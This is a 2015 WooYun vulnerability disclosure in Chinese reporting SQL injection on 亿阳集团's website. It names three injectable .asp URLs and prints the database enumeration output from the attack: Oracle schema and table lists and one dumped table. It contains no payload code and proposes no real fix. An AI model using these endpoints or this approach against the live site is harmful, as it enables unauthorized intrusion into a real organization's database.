亿阳集团SQL注射漏洞 | wooyun-2015-0100589| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100589

漏洞标题：亿阳集团SQL注射漏洞

漏洞作者：路人转黑

提交时间：2015-03-11 17:01

修复时间：2015-04-25 17:02

公开时间：2015-04-25 17:02

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

30M带宽跑起来还是蛮爽快的

详细说明：

问题URL：

www.boco.com.cn/boco/cn/news_0.asp?id=1

www.boco.com.cn/boco/cn/xt_left.asp?comp=1

www.boco.com.cn/boco/cn/xt_news.asp?id=1

漏洞证明：

Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND                 |
+--------------------------------+
Database: INFORDEV
[11 tables]
+--------------------------------+
| CAPLEVEL                       |
| CAPTION                        |
| FUNMODULE                      |
| LANGUAGETYPE                   |
| PAGECONTENT                    |
| PAGEFLOW                       |
| PICTYPE                        |
| SYSROLE                        |
| SYSUSER                        |
| TREECAPTION                    |
| UPFILE                         |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS        |
| CWM2$AWDIMCREATEACCESS         |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS   |
| CWM2$_AW_TEMP_CUST_MEAS_MAP    |
| CWM2$_TEMP_VALUES              |
| OLAP_SESSION_CUBES             |
| OLAP_SESSION_DIMS              |
| XML_LOAD_LOG                   |
| XML_LOAD_RECORDS               |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB                  |
| HELP                           |
| MVIEW$_ADV_INDEX               |
| MVIEW$_ADV_OWB                 |
| MVIEW$_ADV_PARTITION           |
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| AUDIT_ACTIONS                  |
| AW$AWCREATE                    |
| AW$AWCREATE10G                 |
| AW$AWMD                        |
| AW$AWREPORT                    |
| AW$AWXML                       |
| AW$EXPRESS                     |
| DUAL                           |
| IMPDP_STATS                    |
| KU$NOEXP_TAB                   |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| OLAPI_HISTORY                  |
| OLAPI_IFACE_OBJECT_HISTORY     |
| OLAPI_IFACE_OP_HISTORY         |
| OLAPI_MEMORY_HEAP_HISTORY      |
| OLAPI_MEMORY_OP_HISTORY        |
| OLAPI_SESSION_HISTORY          |
| OLAPTABLEVELS                  |
| OLAPTABLEVELTUPLES             |
| OLAP_OLEDB_FUNCTIONS_PVT       |
| OLAP_OLEDB_KEYWORDS            |
| OLAP_OLEDB_MDPROPS             |
| OLAP_OLEDB_MDPROPVALS          |
| PLAN_TABLE$                    |
| PSTUBTBL                       |
| STMT_AUDIT_OPTION_MAP          |
| SYSTEM_PRIVILEGE_MAP           |
| TABLE_PRIVILEGE_MAP            |
| WRI$_ADV_ASA_RECO_DATA         |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES                 |
| SDO_COORD_AXIS_NAMES           |
| SDO_COORD_OPS                  |
| SDO_COORD_OP_METHODS           |
| SDO_COORD_OP_PARAMS            |
| SDO_COORD_OP_PARAM_USE         |
| SDO_COORD_OP_PARAM_VALS        |
| SDO_COORD_OP_PATHS             |
| SDO_COORD_REF_SYS              |
| SDO_COORD_SYS                  |
| SDO_CS_SRS                     |
| SDO_DATUMS                     |
| SDO_DATUMS_OLD_SNAPSHOT        |
| SDO_ELLIPSOIDS                 |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    |
| SDO_GEOR_PLUGIN_REGISTRY       |
| SDO_GEOR_XMLSCHEMA_TABLE       |
| SDO_GR_MOSAIC_0                |
| SDO_GR_MOSAIC_1                |
| SDO_GR_MOSAIC_2                |
| SDO_GR_MOSAIC_3                |
| SDO_GR_RDT_1                   |
| SDO_PREFERRED_OPS_SYSTEM       |
| SDO_PREFERRED_OPS_USER         |
| SDO_PRIME_MERIDIANS            |
| SDO_PROJECTIONS_OLD_SNAPSHOT   |
| SDO_TOPO_DATA$                 |
| SDO_TOPO_RELATION_DATA         |
| SDO_TOPO_TRANSACT_DATA         |
| SDO_TXN_IDX_DELETES            |
| SDO_TXN_IDX_EXP_UPD_RGN        |
| SDO_TXN_IDX_INSERTS            |
| SDO_UNITS_OF_MEASURE           |
| SDO_XML_SCHEMAS                |
+--------------------------------+
Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE             |
| DR$OBJECT_ATTRIBUTE            |
| DR$POLICY_TAB                  |
+--------------------------------+
Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE               |
| WM$VERSION_HIERARCHY_TABLE     |
| WM$VERSION_TABLE               |
| WM$WORKSPACES_TABLE            |
+--------------------------------+

Database: INFORDEV
Table: LANGUAGETYPE
[7 entries]
+------------------+------------------+
| LANGUAGETYPENAME | LANGUAGETYPECODE |
+------------------+------------------+
| 阿拉伯文         | 5                |
| 英文             | 2                |
| 俄文             | 3                |
| 德文             | 4                |
| 中文             | 1                |
| 西班牙文         | 6                |
| 法文             | 7                |
+-------------------------------------+

首页语言选择...吗？
意思到了就行了吧

修复方案：

-.-

版权声明：转载请注明来源路人转黑@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100589

漏洞标题：亿阳集团SQL注射漏洞

相关厂商：亿阳集团

漏洞作者： 路人转黑

提交时间：2015-03-11 17:01

修复时间：2015-04-25 17:02

公开时间：2015-04-25 17:02

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0100589"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人转黑@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人转黑

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人转黑@乌云